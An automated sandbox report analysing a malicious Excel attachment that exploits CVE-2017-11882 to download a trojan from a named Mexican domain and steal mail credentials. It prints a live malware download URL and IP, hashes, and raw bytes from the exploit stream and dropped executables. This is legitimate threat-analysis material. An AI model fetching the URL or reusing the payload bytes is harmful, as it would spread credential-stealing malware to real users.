etc) 19->46 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->48 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 2 other signatures 19->52

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Inquiry N TM24-10-09.xlam.xlsx71%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  Inquiry N TM24-10-09.xlam.xlsx52%VirustotalBrowse
                  Inquiry N TM24-10-09.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\zwuonypqu.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ng5th[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ng5th[1].exe47%ReversingLabsWin32.Trojan.AutoitInject
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ng5th[1].exe48%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\zwuonypqu.exe47%ReversingLabsWin32.Trojan.AutoitInject
                  C:\Users\user\AppData\Local\Temp\zwuonypqu.exe48%VirustotalBrowse
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  eficienciaeningenieria.com.mx0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  https://account.dyn.com/0%URL Reputationsafe
                  http://eficienciaeningenieria.com.mx/vnkl/ng5th.exe14%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  eficienciaeningenieria.com.mx
                  104.21.53.112
                  truetrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://eficienciaeningenieria.com.mx/vnkl/ng5th.exetrueunknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://eficienciaeningenieria.com.mx/vnkl/ng5th.exejEQNEDT32.EXE, 00000002.00000002.470067451.0000000003520000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://account.dyn.com/zwuonypqu.exe, 00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.627037651.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://eficienciaeningenieria.com.mx/vnkl/ng5th.exejjC:EQNEDT32.EXE, 00000002.00000002.469930663.000000000092E000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      104.21.53.112
                      eficienciaeningenieria.com.mxUnited States
                      13335CLOUDFLARENETUStrue
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1530597
                      Start date and time:2024-10-10 09:38:42 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 35s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Inquiry N TM24-10-09.xlam.xlsx
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winXLSX@6/5@1/1
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 50
                      • Number of non-executed functions: 318
                      Cookbook Comments:
                      • Found application associated with file extension: .xlsx
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                      • Execution Graph export aborted for target RegSvcs.exe, PID 3736 because it is empty
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      03:40:25API Interceptor73x Sleep call for process: EQNEDT32.EXE modified
                      03:40:32API Interceptor231x Sleep call for process: RegSvcs.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      104.21.53.112New Order #QAY3763.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • eficienciaeningenieria.com.mx/ngqwpl/ngown.exe
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      eficienciaeningenieria.com.mxNew Order #QAY3763.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 104.21.53.112
                      PaymentIBAN Confirmation.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 172.67.212.58
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUShlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                      • 104.21.56.70
                      Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                      • 104.21.2.6
                      #U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • 188.114.97.3
                      Logistics1.vbsGet hashmaliciousFormBookBrowse
                      • 188.114.96.3
                      Quarantined Messages(11).zipGet hashmaliciousHTMLPhisherBrowse
                      • 104.17.25.14
                      https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                      • 104.16.117.116
                      file.exeGet hashmaliciousLummaCBrowse
                      • 104.21.53.8
                      PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                      • 188.114.96.3
                      zYlQoif21X.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                      • 172.67.206.204
                      MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                      • 104.21.56.207
                      No context
                      No context
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):1128615
                      Entropy (8bit):7.370392045920559
                      Encrypted:false
                      SSDEEP:24576:ffmMv6Ckr7Mny5QLhBlwMPSMoXh0s4fdx1eDDSE3to:f3v+7/5QLhBt63Ex1eDV9o
                      MD5:E393C90747E935149ECABF5AF936A07A
                      SHA1:2142B77E3D70DC270461A9F474E28BE74B431F4C
                      SHA-256:AA896F6D492AF898AB32FCBC5096C415444B86C8CC609B14DD4B2985597A9EAA
                      SHA-512:780A6B5ECB5B0E32DEF470C002C323FAF53C1E09086543F4B4437761752D411F3B95B7AB58856E0D126C8141E275935AF4F79954047C36969262B33EE77F567F
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 47%
                      • Antivirus: Virustotal, Detection: 48%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\zwuonypqu.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):240128
                      Entropy (8bit):6.68452409794398
                      Encrypted:false
                      SSDEEP:6144:HuWvIGPUhfPhHgUcd/UMHZKDSvUWckSHGfg:HdzPUhfPhABd/UsK6OkEcg
                      MD5:EBC087CBC146BBDFDD0FBECD8280AB24
                      SHA1:E343DFEC54800B27CA654D577C94358FAFAC2C4E
                      SHA-256:F110E5E9AD5B46D48A51D93D29B59B32B80F36FB3CB89568863997FA6629B957
                      SHA-512:52962EE601D7A5580231C636D6E31F36691B4448384095D914DCCAB2EAAD0B74F79C9160F27106F83B300E9ED35646D42E41D32D3A6B6EB29A109DCD0D29EF10
                      Malicious:false
                      Reputation:low
                      Preview:uj.2BYMVJY88.GM.CORR80ZrAYMVNY880IGM3CORR80Z2AYMVNY880IGM3C.RR8>E.OY._.x.9|.f.[*<r"J_=@ 4m5/7VWDi%(.1:<rQ^zv..m;!=].=DMi3CORR80.wAY.WMY~..,GM3CORR8.Z0@RL]NY.;0IOM3CORR..Y2AyMVN.;80I.M3cORR:0Z6AYMVNY8<0IGM3CORR<0Z0AYMVNY:8p.GM#COBR80Z"AY]VNY880YGM3CORR80Z2y.NV.Y880.DMuFORR80Z2AYMVNY880IGM.@O^R80Z2AYMVNY880IGM3CORR80Z2AYMVNY880IGM3CORR80Z2AYMVNy888IGM3CORR80Z:aYM.NY880IGM3CO|&]H.2AY..MY8.0IG.0COPR80Z2AYMVNY880iGMSm=! [0Z2.\MVN.;80OGM3.LRR80Z2AYMVNY8x0I.cA&#=180V2AYM.MY8:0IG.0CORR80Z2AYMVN.88rIGM3CORR80Z2AYMV>.;80IGM{CORP85Z..[M..X8;0IGL3CIRR80Z2AYMVNY880IGM3CORR80Z2AYMVNY880IGM3CORR80Z2\...p.x4yGQD.t._.Y..J..7.w7q\.6'...5....j#H.q8.Fw.F../.I\4W.....q'FBM'.%.?;.\....d.Lp..K].5..Nh./_i.g....j....@&.`..F...9#wYH@%"c`")3 Q.X.@YMVN.......*7...3U,uK5......[?....,80ZVAYM$NY8Y0IG.3CO=R8042AY3VNYF80I.M3C.RR8.Z2A|MVN4880mGM3=ORR.MU=..?=..80IGM...b.U.....z...I.7./....6.{.hD..Y&.O{|...=..9..'.YGz..IX><5K@I0Or\....C]ISL^<;<tI...s.......'...kJ.;M3CORR.0Z.AYM..Y.80I.M.C..R80..A.M.N..0
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):1128615
                      Entropy (8bit):7.370392045920559
                      Encrypted:false
                      SSDEEP:24576:ffmMv6Ckr7Mny5QLhBlwMPSMoXh0s4fdx1eDDSE3to:f3v+7/5QLhBt63Ex1eDV9o
                      MD5:E393C90747E935149ECABF5AF936A07A
                      SHA1:2142B77E3D70DC270461A9F474E28BE74B431F4C
                      SHA-256:AA896F6D492AF898AB32FCBC5096C415444B86C8CC609B14DD4B2985597A9EAA
                      SHA-512:780A6B5ECB5B0E32DEF470C002C323FAF53C1E09086543F4B4437761752D411F3B95B7AB58856E0D126C8141E275935AF4F79954047C36969262B33EE77F567F
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 47%
                      • Antivirus: Virustotal, Detection: 48%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):165
                      Entropy (8bit):1.4377382811115937
                      Encrypted:false
                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                      MD5:797869BB881CFBCDAC2064F92B26E46F
                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):165
                      Entropy (8bit):1.4377382811115937
                      Encrypted:false
                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                      MD5:797869BB881CFBCDAC2064F92B26E46F
                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                      Malicious:true
                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      File type:Microsoft Excel 2007+
                      Entropy (8bit):7.983644622316028
                      TrID:
                      • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                      • ZIP compressed archive (8000/1) 18.60%
                      File name:Inquiry N TM24-10-09.xlam.xlsx
                      File size:822'403 bytes
                      MD5:c4d3d1b1842e510619920b9492900250
                      SHA1:25749eb1073ce81fd72314dda9efab61adb70b3f
                      SHA256:f8fb6c4ac020b9b8116781833ad5f536979a2e21986601c55928a2bfcc3036ce
                      SHA512:dd3c9e5590f43fa891142106169a90d2ec986f3db45a641d38c4af326ac7b600eb9442b4fca0b0fd3f096b547cce6162535bbc67d6fe534e1f7c3c44d4d72919
                      SSDEEP:12288:5UDmtDq7MeSQA4rwbZswK/j+c61E/y7CEBbJlFE54zuvBBhvWHK0QbJXaw71DrGb:WDf4lYrwzKrV6S/yBruv/hHxbdD1Drub
                      TLSH:BE051244B35D09F9965D42890400BF1723C741426AAB74B92F839FA399962E78F3FE1F
                      File Content Preview:PK.........MHY..us............[Content_Types].xmlUT...H..gH..gH..g.T.n.0....?..."...4..C....I.\W..b....c.}Vr.E...........!g.k....bch.TND.AGc.....~...*........"......6.K..P....3....C.1a..y....y...%,P}.L.+..a..z.q>....5X.@...YG.."f..:..'..[`...H.Y....U0...q
                      Icon Hash:2562ab89a7b7bfbf
                      Document Type:OpenXML
                      Number of OLE Files:1
                      Has Summary Info:
                      Application Name:
                      Encrypted Document:False
                      Contains Word Document Stream:False
                      Contains Workbook/Book Stream:False
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:False
                      Flash Objects Count:0
                      Contains VBA Macros:False
                      Author:Jose Suarez
                      Last Saved By:HP
                      Create Time:2024-09-30T12:55:35Z
                      Last Saved Time:2024-10-01T18:04:35Z
                      Creating Application:Microsoft Excel
                      Security:0
                      Thumbnail Scaling Desired:false
                      Contains Dirty Links:false
                      Shared Document:false
                      Changed Hyperlinks:false
                      Application Version:12.0000
                      General
                      Stream Path:\x1OLE10NaTive
                      CLSID:
                      File Type:data
                      Stream Size:1062521
                      Entropy:5.888315759667753
                      Base64 Encoded:False
                      Data ASCII:? . . $ . . . . C w B . 0 6 T T M L V . l . q i a M . D . . l V . } . , . . . q e \\ ' ` B . : A # . \\ V Z . < . ? . < W . . . . . . { 5 _ . d . 0 > N a ; f s x M . 1 c $ _ . f ; . ' R . . J . . { . . . . . . / # . C . F . d . T V T W V . v > R . . d > G . . L q / . . A ^ . . . . 6 v . H V o q . . d * . < E $ . . ] = A : ! d P o $ . . b T P h . ! . V g ? . . 2 . ] . 7 . . A { . . . Q M U z z R K J n \\ d ~ 0 . 1 . . W m F 4 7 f . k ) ^ Q = E < . . . N J . | | . i . . C . * . . . . 1 F . . . . . . . . . . .
                      Data Raw:d4 3f 8c 02 02 24 0e ef d5 7f 01 08 43 77 b8 c3 42 ba ff f7 d0 8b 30 8b 36 bd 86 99 91 54 81 f5 e2 fe d7 54 8b 4d 4c 56 ff d1 83 c0 6c ff e0 91 c7 e6 ff 06 71 69 61 4d e9 ca b8 9a 44 00 17 ea 6c 56 e8 84 de 8d cd ce 7d 0d 2c a2 8e c6 1f f2 98 ac aa a1 a6 cc 0a 71 f7 65 5c e7 27 88 60 42 17 3a 41 23 17 5c 56 5a 08 3c 0a 3f 1f 87 3c 8d e9 57 01 00 00 17 fa 0d bc 96 0a f7 fa 7b 85 35
                      General
                      Stream Path:fcJce2AuVf38Jz5M10nDkF97H
                      CLSID:
                      File Type:empty
                      Stream Size:0
                      Entropy:0.0
                      Base64 Encoded:False
                      Data ASCII:
                      Data Raw:
                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-10-10T09:40:28.203790+02002022550ET MALWARE Possible Malicious Macro DL EXE Feb 20161192.168.2.2249163104.21.53.11280TCP
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 10, 2024 09:40:27.616908073 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:27.621807098 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:27.621890068 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:27.622111082 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:27.626828909 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203718901 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203747988 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203762054 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203789949 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.203804970 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.203840017 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203845978 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.203859091 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203872919 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203886986 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203907013 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.203917027 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203929901 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203948021 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.203949928 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.203949928 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.203989029 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.204004049 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.208635092 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.208652020 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.208683014 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.208708048 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.214611053 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.290399075 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.290412903 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.290472031 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.290502071 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.290515900 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.290530920 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.290544033 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.290555954 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.290565968 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.290575027 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.290599108 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.291035891 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.291060925 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.291074038 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.291083097 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.291102886 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.291454077 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.291466951 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.291481972 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.291496038 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.291505098 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.291517973 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.291549921 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.291968107 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.291992903 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.292016029 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.292063951 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.292078018 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.292093992 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.292105913 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.292128086 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.292151928 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.292167902 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.292192936 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.292207003 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.292973995 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.292988062 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.293004036 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.293026924 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.293041945 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.295540094 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.295593977 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.295619965 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.295665026 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.377758026 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.377795935 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.377811909 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.377862930 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.377877951 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.377893925 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.377909899 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.377926111 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.377938032 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.377948046 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.377962112 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.377991915 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378007889 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378026962 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378041983 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378055096 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378063917 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378099918 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378124952 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378139973 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378154039 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378163099 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378175020 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378185034 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378196955 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378217936 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378253937 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378597975 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378633022 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378643036 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378658056 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378679991 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378700972 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378724098 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378737926 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378752947 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378768921 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378778934 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378791094 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378818989 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378829956 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378844023 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378858089 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378870964 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.378880024 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378895044 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.378912926 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379353046 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379473925 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379491091 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379504919 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379525900 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379538059 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379565001 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379580021 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379594088 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379604101 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379617929 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379626989 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379648924 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379663944 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379678011 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379692078 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379704952 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379713058 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379724979 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379736900 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.379746914 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379782915 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.379837036 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.380059958 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.380467892 CEST8049163104.21.53.112192.168.2.22
